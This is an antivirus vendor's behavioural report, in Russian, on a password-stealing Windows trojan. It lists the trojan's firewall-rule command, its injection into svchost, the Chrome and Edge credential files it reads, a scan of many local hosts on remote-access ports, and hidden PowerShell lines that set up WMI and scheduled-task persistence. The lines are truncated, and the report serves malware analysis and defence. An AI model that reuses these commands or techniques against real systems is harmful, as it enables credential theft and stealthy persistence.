Trojan.PWS.Siggen5.32499

Техническая информация

Вредоносные функции

Запускает на исполнение

'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="WinDiagSvc" dir=in action=allow program="<Полный путь к файлу>" enable=yes >nul 2>&1

Внедряет код в

следующие системные процессы:

<SYSTEM32>\svchost.exe

Завершает или пытается завершить

следующие системные процессы:

<SYSTEM32>\svchost.exe

Читает файлы, отвечающие за хранение паролей сторонними программами

%LOCALAPPDATA%\google\chrome\user data\default\cookies
%LOCALAPPDATA%\google\chrome\user data\default\login data
%LOCALAPPDATA%\google\chrome\user data\default\web data
%LOCALAPPDATA%\microsoft\edge\user data\default\login data
%LOCALAPPDATA%\microsoft\edge\user data\default\web data

Изменения в файловой системе

Создает следующие файлы

%TEMP%\exfil_debug.log

Сетевая активность

Подключается к

'ap#.#pify.org':80
'13#.#80.144.160':443
'<LOCALNET>..34.1':22
'<LOCALNET>..34.1':80
'<LOCALNET>..34.1':135
'<LOCALNET>..34.1':443
'<LOCALNET>..34.1':445
'<LOCALNET>..34.1':3389
'<LOCALNET>..34.1':5985
'<LOCALNET>..34.1':8080
'<LOCALNET>..34.2':22
'<LOCALNET>..34.2':80
'<LOCALNET>..34.2':135
'<LOCALNET>..34.2':443
'<LOCALNET>..34.2':445
'<LOCALNET>..34.2':3389
'<LOCALNET>..34.2':5985
'<LOCALNET>..34.2':8080
'<LOCALNET>..34.3':22
'<LOCALNET>..34.3':80
'<LOCALNET>..34.3':135
'<LOCALNET>..34.3':443
'<LOCALNET>..34.3':445
'<LOCALNET>..34.3':3389
'<LOCALNET>..34.3':5985
'<LOCALNET>..34.3':8080
'<LOCALNET>..34.4':22
'<LOCALNET>..34.4':80
'<LOCALNET>..34.4':135
'<LOCALNET>..34.4':443
'<LOCALNET>..34.4':445
'<LOCALNET>..34.4':3389
'<LOCALNET>..34.4':5985
'<LOCALNET>..34.4':8080
'<LOCALNET>..34.5':22
'<LOCALNET>..34.5':80
'<LOCALNET>..34.5':135
'<LOCALNET>..34.5':443
'<LOCALNET>..34.5':445
'<LOCALNET>..34.5':3389
'<LOCALNET>..34.5':5985
'<LOCALNET>..34.5':8080
'<LOCALNET>..34.6':22
'<LOCALNET>..34.6':80
'<LOCALNET>..34.6':135
'<LOCALNET>..34.6':443
'<LOCALNET>..34.6':445
'<LOCALNET>..34.6':3389
'<LOCALNET>..34.6':5985
'<LOCALNET>..34.6':8080
'<LOCALNET>..34.7':22
'<LOCALNET>..34.7':80
'<LOCALNET>..34.7':135
'<LOCALNET>..34.7':443
'<LOCALNET>..34.7':445
'<LOCALNET>..34.7':3389
'<LOCALNET>..34.7':5985
'<LOCALNET>..34.7':8080
'<LOCALNET>..34.8':22
'<LOCALNET>..34.8':80
'<LOCALNET>..34.8':135
'<LOCALNET>..34.8':443
'<LOCALNET>..34.8':445
'<LOCALNET>..34.8':3389
'<LOCALNET>..34.8':5985
'<LOCALNET>..34.8':8080
'<LOCALNET>..34.9':22
'<LOCALNET>..34.9':80
'<LOCALNET>..34.9':135
'<LOCALNET>..34.9':443
'<LOCALNET>..34.9':445
'<LOCALNET>..34.9':3389
'<LOCALNET>..34.9':5985
'<LOCALNET>..34.9':8080
'<LOCALNET>..34.10':22
'<LOCALNET>..34.10':80
'<LOCALNET>..34.10':135
'<LOCALNET>..34.10':443
'<LOCALNET>..34.10':445
'<LOCALNET>..34.10':3389
'<LOCALNET>..34.10':5985
'<LOCALNET>..34.10':8080
'<LOCALNET>..34.11':22
'<LOCALNET>..34.11':80
'<LOCALNET>..34.11':135
'<LOCALNET>..34.11':443
'<LOCALNET>..34.11':445
'<LOCALNET>..34.11':3389
'<LOCALNET>..34.11':5985
'<LOCALNET>..34.11':8080
'<LOCALNET>..34.12':22
'<LOCALNET>..34.12':80
'<LOCALNET>..34.12':135
'<LOCALNET>..34.12':443
'<LOCALNET>..34.12':445
'<LOCALNET>..34.12':3389
'<LOCALNET>..34.12':5985
'<LOCALNET>..34.12':8080
'<LOCALNET>..34.13':22
'<LOCALNET>..34.13':80
'<LOCALNET>..34.13':135
'<LOCALNET>..34.13':443
'<LOCALNET>..34.13':445
'<LOCALNET>..34.13':3389
'<LOCALNET>..34.13':5985
'<LOCALNET>..34.13':8080
'<LOCALNET>..34.15':22
'<LOCALNET>..34.15':80
'<LOCALNET>..34.15':135
'<LOCALNET>..34.15':443
'<LOCALNET>..34.15':445
'<LOCALNET>..34.15':3389
'<LOCALNET>..34.15':5985
'<LOCALNET>..34.15':8080
'<LOCALNET>..34.16':22
'<LOCALNET>..34.16':80
'<LOCALNET>..34.16':135
'<LOCALNET>..34.16':443
'<LOCALNET>..34.16':445
'<LOCALNET>..34.16':3389
'<LOCALNET>..34.16':5985
'<LOCALNET>..34.16':8080
'<LOCALNET>..34.17':22
'<LOCALNET>..34.17':80
'<LOCALNET>..34.17':135
'<LOCALNET>..34.17':443
'<LOCALNET>..34.17':445
'<LOCALNET>..34.17':3389
'<LOCALNET>..34.17':5985
'<LOCALNET>..34.17':8080
'<LOCALNET>..34.18':22
'<LOCALNET>..34.18':80

TCP

Запросы HTTP GET

http://ap#.#pify.org/

Другие

'13#.#80.144.160':443

UDP

DNS ASK ap#.#pify.org

Другое

Запускает на исполнение

'<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "<Полный путь к файлу>"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -nop -ep bypass -c "$ns='root/subscription';$fn='BCD Integrity Check';$cn='BCD Integrity Validator';$wql='SELECT * FROM __InstanceModificationEvent WITHIN 14400 WHERE TargetInstance I... (со скрытым окном)
'<SYSTEM32>\svchost.exe' -k netsvcs (со скрытым окном)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -nop -ep bypass -c "$mb='%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe';if(!(Test-Path $mb)){$mb='%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'};$a=New-Schedule... (со скрытым окном)
'<SYSTEM32>\svchost.exe' (со скрытым окном)
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="WinDiagSvc" dir=in action=allow program="<Полный путь к файлу>" enable=yes >nul 2>&1 (со скрытым окном)